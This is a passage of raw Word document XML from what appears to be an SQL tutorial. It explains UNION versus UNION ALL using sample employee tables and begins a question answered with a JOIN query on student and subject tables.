      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="7BCC4990" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A41F6B0"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA189C5"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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="432EF72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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="726D97AF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672F1491"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1434F73D"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Priya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EFD9C9A"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7161094F"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In this case, all rows from both tables are included in the result, even if they are duplicates (though in this example, there are no duplicates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF1BE7"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Difference Between UNION and UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE3EAB"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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Combines the result sets and removes duplicate rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46E01E"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UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Combines the result sets and keeps all rows, including duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310A901"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ample with Duplicate Rows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11306E7F"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ployee_US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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="77F72BE7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0BBD88"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F72B124"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E02AEC2"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="4C845327" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605C3E9E"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DDB1D6C"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0492E5"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="172C0491" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B76D198"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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68536033"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="619E7644"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB7FDCE"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ployee_India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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2EA810B3" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4390741E"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17C38A27"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4397B92F"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="4CF72DF7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00956797"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB3C70C"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E8043B"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="42BA7DA6" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41AB311A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F877A2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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B65FD7C"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07733009"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Query with UNION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69067DDE"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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39179B1F"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FROM Employee_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6B633"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UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8965F"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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D9E2B"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FROM Employee_India;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9A193"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Result (duplicates remov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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="69F52FAD" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4868F4"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EF4FB4"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D177FE"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="5422A525" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E32E8F8"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02206C3B"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30E4C9E8"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="4317D95E" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50266172"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B75268E"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0855151E"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2B16CD98" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04FAD134"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25387A81"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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C06CB3"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24DA0D66"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Query with UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40CFFB"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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D77A66D"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FROM Employee_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238800F"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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C959ED5"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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB33FC"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FROM Employee_India;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0625E3"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Result (duplicates includ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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="526CABE7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E8390D"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE17B6A"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38488D97"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="754822A4" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E0B92CA"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0B0902"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B6538FC"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="0EC0365D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B65DA99"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D800483"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7339E2D7"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="4419DDB5" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF242C2"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF7F66D"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79B58770"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="5711DD95" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5B32B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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B52E4E"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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39BE5D66"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="636E7A90" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2060D38F"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to combine result sets without removing duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0E858" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It is faster than UNION because it does not perform the duplicate-checking operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC236E" w14:textId="057411B9"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6619C3A9">
          <v:rect id="_x0000_i3042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7AD81A" w14:textId="026CA2D9" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="743" w:name="_Toc196308223"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00BD197A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="00BD197A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- D</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>isplay a list of students which have a Mathematics subject?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="743"/>
    </w:p>
    <w:p w14:paraId="36C14FB6" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>Input - Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BD308" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BB28D" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>student_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D7A22" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>Subject_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C31296" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>Subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACF316" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>subject_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F670BB" w14:textId="77777777" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>Subject_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5FCB1" w14:textId="634F7253" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF" w:rsidP="00CD0AFF">
      <w:pPr>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t>Where subject=Mathematics</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EA650" w14:textId="747764BA" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176B" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To display a list of students who have the subject "Mathematics", you would need to perform a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation between the Student table and the Subject table based on the Subject_id. Then, you would filter the results by checking if the Subject_name is "Mathematics".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF43D9"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Here’s the SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AAE2D" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338E616"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SELECT s.student_id, s.student_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFD001"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FROM Student s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B937F"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JOIN Subject sub ON s.Subject_id = sub.subject_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219666E0"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lastRenderedPageBreak/>
        <w:t>WHERE sub.Subject_name = 'Mathematics';</w:t>
      </w:r>
    </w:p>
